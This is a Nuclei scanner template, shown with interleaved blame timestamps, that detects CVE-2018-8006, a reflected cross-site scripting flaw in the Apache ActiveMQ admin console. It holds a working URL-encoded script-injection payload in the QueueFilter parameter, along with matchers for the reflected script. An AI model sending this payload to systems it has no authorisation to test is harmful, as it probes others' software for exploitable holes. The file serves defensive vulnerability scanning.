2021-01-09 14:45:11 +00:00
id : CVE-2018-8006
info :
2022-08-12 00:45:50 +00:00
name : Apache ActiveMQ <=5.15.5 - Cross-Site Scripting
2021-04-06 06:46:11 +00:00
author : pdteam
2021-01-09 14:45:11 +00:00
severity : medium
2022-08-12 00:45:50 +00:00
description : Apache ActiveMQ versions 5.0.0 to 5.15.5 are vulnerable to cross-site scripting via the web based administration console on the queue.jsp page. The root cause of this issue is improper data filtering of the QueueFilter parameter.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade Apache ActiveMQ to a version higher than 5.15.5 or apply the necessary patches provided by the vendor.
2021-09-10 11:26:40 +00:00
reference :
- http://activemq.apache.org/security-advisories.data/CVE-2018-8006-announcement.txt
- https://lists.apache.org/thread.html/2b5c0039197a4949f29e1e2c9441ab38d242946b966f61c110808bcc@%3Ccommits.activemq.apache.org%3E
- https://lists.apache.org/thread.html/fcbe6ad00f1de142148c20d813fae3765dc4274955e3e2f3ca19ff7b@%3Cdev.activemq.apache.org%3E
- https://lists.apache.org/thread.html/a859563f05fbe7c31916b3178c2697165bd9bbf5a65d1cf62aef27d2@%3Ccommits.activemq.apache.org%3E
- https://lists.apache.org/thread.html/03f91b1fb85686a848cee6b90112cf6059bd1b21b23bacaa11a962e1@%3Cdev.activemq.apache.org%3E
- https://lists.apache.org/thread.html/3f1e41bc9153936e065ca3094bd89ff8167ad2d39ac0b410f24382d2@%3Cgitbox.activemq.apache.org%3E
- https://lists.apache.org/thread.html/c0ec53b72b3240b187afb1cf67e4309a9e5f607282010aa196734814@%3Cgitbox.activemq.apache.org%3E
- https://lists.apache.org/thread.html/rb698ed085f79e56146ca24ab359c9ef95846618675ea1ef402e04a6d@%3Ccommits.activemq.apache.org%3E
- https://lists.apache.org/thread.html/r946488fb942fd35c6a6e0359f52504a558ed438574a8f14d36d7dcd7@%3Ccommits.activemq.apache.org%3E
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-8006
2022-04-22 10:38:41 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2018-8006
cwe-id : CWE-79
2023-11-09 06:04:52 +00:00
epss-score : 0.34776
2023-11-27 09:19:41 +00:00
epss-percentile : 0.96695
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : apache
product : activemq
tags : cve,cve2018,apache,activemq,xss
2021-01-09 14:45:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-01-09 14:45:11 +00:00
- method : GET
path :
- '{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68'
2023-07-11 19:49:27 +00:00
2021-01-09 14:45:11 +00:00
matchers-condition : and
matchers :
- type : word
words :
- '"><script>alert("1")</script>'
2022-07-05 03:40:03 +00:00
2021-01-09 14:45:11 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-01-09 14:45:11 +00:00
words :
- "/html"
2022-07-05 03:40:03 +00:00
- type : status
status :
- 200
2023-12-05 09:50:33 +00:00
2023-11-27 10:10:24 +00:00
# digest: 490a0046304402204b12bfc8cfbc37588cbd40608ca7f383f3eeedb86a0af7ad23d3c72f5fbca8e502205b0faa203ef4993adc49b2cc58f1dbdac19208dc353984a4b03f7d608ecbc96f:922c64590222798bb761d5b6d8e72950